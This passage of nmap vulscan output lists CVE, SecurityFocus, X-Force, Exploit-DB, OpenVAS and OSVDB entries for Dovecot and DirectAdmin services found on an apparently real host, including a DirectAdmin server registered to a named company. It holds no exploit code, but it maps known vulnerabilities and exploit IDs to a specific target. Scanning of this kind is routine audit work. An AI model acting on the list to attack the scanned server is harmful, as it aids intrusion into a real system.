18998| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
18999| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
19000| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
19001| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
19002| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
19003| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
19004| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
19005| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
19006| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
19007| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
19008| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
19009| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
19010| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
19011| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
19012| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
19013| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
19014| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
19015| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
19016| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
19017| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
19018| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
19019| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
19020| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
19021| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
19022| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
19023| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
19024| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
19025| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
19026| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
19027| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
19028| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
19029| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
19030| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
19031| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
19032| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
19033| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
19034| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
19035| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
19036| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
19037| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
19038|
19039| SecurityFocus - https://www.securityfocus.com/bid/:
19040| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
19041| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
19042| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
19043| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
19044| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
19045| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
19046| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
19047| [67306] Dovecot Denial of Service Vulnerability
19048| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
19049| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
19050| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
19051| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
19052| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
19053| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
19054| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
19055| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
19056| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
19057| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
19058| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
19059| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
19060| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
19061| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
19062| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
19063| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
19064| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
19065| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
19066| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
19067| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
19068| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
19069| [39838] tpop3d Remote Denial of Service Vulnerability
19070| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
19071| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
19072| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
19073| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
19074| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
19075| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
19076| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
19077| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
19078| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
19079| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
19080| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
19081| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
19082| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
19083| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
19084| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
19085| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
19086| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
19087| [23254] DirectAdmin Logfile HTML Injection Vulnerability
19088| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
19089| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
19090| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
19091| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
19092| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
19093| [17961] Dovecot Remote Information Disclosure Vulnerability
19094| [16672] Dovecot Double Free Denial of Service Vulnerability
19095| [8495] akpop3d User Name SQL Injection Vulnerability
19096| [8473] Vpop3d Remote Denial Of Service Vulnerability
19097| [3990] ZPop3D Bad Login Logging Failure Vulnerability
19098| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
19099|
19100| IBM X-Force - https://exchange.xforce.ibmcloud.com:
19101| [86382] Dovecot POP3 Service denial of service
19102| [85490] DirectAdmin Backup System email account functionality symlink
19103| [85488] DirectAdmin Backup System symlink
19104| [84396] Dovecot IMAP APPEND denial of service
19105| [80453] Dovecot mail-search.c denial of service
19106| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
19107| [72685] DirectAdmin domain parameter cross-site request forgery
19108| [71354] Dovecot SSL Common Name (CN) weak security
19109| [67675] Dovecot script-login security bypass
19110| [67674] Dovecot script-login directory traversal
19111| [67589] Dovecot header name denial of service
19112| [67254] DirectAdmin MySQL information disclosure
19113| [67253] DirectAdmin hard link privilege escalation
19114| [63267] Apple Mac OS X Dovecot information disclosure
19115| [62340] Dovecot mailbox security bypass
19116| [62339] Dovecot IMAP or POP3 denial of service
19117| [62256] Dovecot mailbox security bypass
19118| [62255] Dovecot ACL entry security bypass
19119| [60639] Dovecot ACL plugin weak security
19120| [57267] Apple Mac OS X Dovecot Kerberos security bypass
19121| [56875] DirectAdmin name cross-site scripting
19122| [56763] Dovecot header denial of service
19123| [55181] DirectAdmin account cross-site request forgery
19124| [54363] Dovecot base_dir privilege escalation
19125| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
19126| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
19127| [50167] DirectAdmin CMD_DB command execution
19128| [49416] DirectAdmin CMD_DB backup action symlink
19129| [46323] Dovecot dovecot.conf information disclosure
19130| [46227] Dovecot message parsing denial of service
19131| [45669] Dovecot ACL mailbox security bypass
19132| [45667] Dovecot ACL plugin rights security bypass
19133| [41085] Dovecot TAB characters authentication bypass
19134| [41009] Dovecot mail_extra_groups option unauthorized access
19135| [39342] Dovecot LDAP auth cache configuration security bypass
19136| [36510] DirectAdmin user parameter cross-site scripting
19137| [35767] Dovecot ACL plugin security bypass
19138| [35177] DirectAdmin domain parameter cross-site scripting
19139| [34082] Dovecot mbox-storage.c directory traversal
19140| [33390] DirectAdmin log file cross-site scripting
19141| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
19142| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
19143| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
19144| [26578] Cyrus IMAP pop3d buffer overflow
19145| [26536] Dovecot IMAP LIST information disclosure
19146| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
19147| [24709] Dovecot APPEND command denial of service
19148| [13018] akpop3d authentication code SQL injection
19149| [7345] Slackware Linux imapd and ipop3d core dump
19150| [6269] imap, ipop2d and ipop3d buffer overflows
19151| [5923] Linuxconf vpop3d symbolic link
19152| [4918] IPOP3D, Buffer overflow attack
19153| [1560] IPOP3D, user login successful
19154| [1559] IPOP3D user login to remote host successful
19155| [1525] IPOP3D, user logout
19156| [1524] IPOP3D, user auto-logout
19157| [1523] IPOP3D, user login failure
19158| [1522] IPOP3D, brute force attack
19159| [1521] IPOP3D, user kiss of death logout
19160| [418] pop3d mktemp creates insecure temporary files
19161|
19162| Exploit-DB - https://www.exploit-db.com:
19163| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
19164| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
19165| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
19166| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
19167| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
19168| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
19169| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
19170| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
19171| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
19172| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
19173| [23053] Vpop3d Remote Denial of Service Vulnerability
19174| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
19175| [11893] tPop3d 1.5.3 DoS
19176| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
19177| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
19178| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
19179| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
19180| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
19181| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
19182| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
19183|
19184| OpenVAS (Nessus) - http://www.openvas.org:
19185| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
19186| [901025] Dovecot Version Detection
19187| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
19188| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
19189| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
19190| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
19191| [870607] RedHat Update for dovecot RHSA-2011:0600-01
19192| [870471] RedHat Update for dovecot RHSA-2011:1187-01
19193| [870153] RedHat Update for dovecot RHSA-2008:0297-02
19194| [863272] Fedora Update for dovecot FEDORA-2011-7612
19195| [863115] Fedora Update for dovecot FEDORA-2011-7258
19196| [861525] Fedora Update for dovecot FEDORA-2007-664
19197| [861394] Fedora Update for dovecot FEDORA-2007-493
19198| [861333] Fedora Update for dovecot FEDORA-2007-1485
19199| [860845] Fedora Update for dovecot FEDORA-2008-9202
19200| [860663] Fedora Update for dovecot FEDORA-2008-2475
19201| [860169] Fedora Update for dovecot FEDORA-2008-2464
19202| [860089] Fedora Update for dovecot FEDORA-2008-9232
19203| [840950] Ubuntu Update for dovecot USN-1295-1
19204| [840668] Ubuntu Update for dovecot USN-1143-1
19205| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
19206| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
19207| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
19208| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
19209| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
19210| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
19211| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
19212| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
19213| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
19214| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
19215| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
19216| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
19217| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
19218| [70259] FreeBSD Ports: dovecot
19219| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
19220| [66522] FreeBSD Ports: dovecot
19221| [65010] Ubuntu USN-838-1 (dovecot)
19222| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
19223| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
19224| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
19225| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
19226| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
19227| [62854] FreeBSD Ports: dovecot-managesieve
19228| [61916] FreeBSD Ports: dovecot
19229| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
19230| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
19231| [60528] FreeBSD Ports: dovecot
19232| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
19233| [60089] FreeBSD Ports: dovecot
19234| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
19235| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
19236|
19237| SecurityTracker - https://www.securitytracker.com:
19238| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
19239| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
19240| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
19241| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
19242|
19243| OSVDB - http://www.osvdb.org:
19244| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
19245| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
19246| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
19247| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
19248| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
19249| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
19250| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
19251| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
19252| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
19253| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
19254| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
19255| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
19256| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
19257| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
19258| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
19259| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
19260| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
19261| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
19262| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
19263| [66113] Dovecot Mail Root Directory Creation Permission Weakness
19264| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
19265| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
19266| [66110] Dovecot Multiple Unspecified Buffer Overflows
19267| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
19268| [64783] Dovecot E-mail Message Header Unspecified DoS
19269| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
19270| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
19271| [62796] Dovecot mbox Format Email Header Handling DoS
19272| [61395] DirectAdmin Admin Account Creation CSRF
19273| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
19274| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
19275| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
19276| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
19277| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
19278| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
19279| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
19280| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
19281| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
19282| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
19283| [43137] Dovecot mail_extra_groups Symlink File Manipulation
19284| [42979] Dovecot passdbs Argument Injection Authentication Bypass
19285| [39876] Dovecot LDAP Auth Cache Security Bypass
19286| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
19287| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
19288| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
19289| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
19290| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
19291| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
19292| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
19293| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
19294| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
19295| [32673] DirectAdmin CMD_TICKET type Parameter XSS
19296| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
19297| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
19298| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
19299| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
19300| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
19301| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
19302| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
19303| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
19304| [23281] Dovecot imap/pop3-login dovecot-auth DoS
19305| [23280] Dovecot Malformed APPEND Command DoS
19306| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
19307| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
19308| [5857] Linux pop3d Arbitrary Mail File Access
19309| [2471] akpop3d username SQL Injection
19310|_
193112222/tcp open http DirectAdmin httpd 1.59.5 (Registered to Shinjiru Technology Sdn. Bhd.)
19312|_http-trane-info: Problem with XML parsing of /evox/about
19313| vulscan: VulDB - https://vuldb.com:
19314| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
19315| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
19316| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
19317| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
19318| [95100] DirectAdmin up to 1.50.1 Crash denial of service
19319| [62578] DirectAdmin 1.403 cross site scripting
19320| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
19321| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
19322| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
19323| [38747] DirectAdmin 1.30.2 cross site scripting
19324| [37578] DirectAdmin 1.30.1 cross site scripting
19325| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
19326| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
19327| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
19328|
19329| MITRE CVE - https://cve.mitre.org:
19330| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
19331| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
19332| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
19333| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
19334| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
19335| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
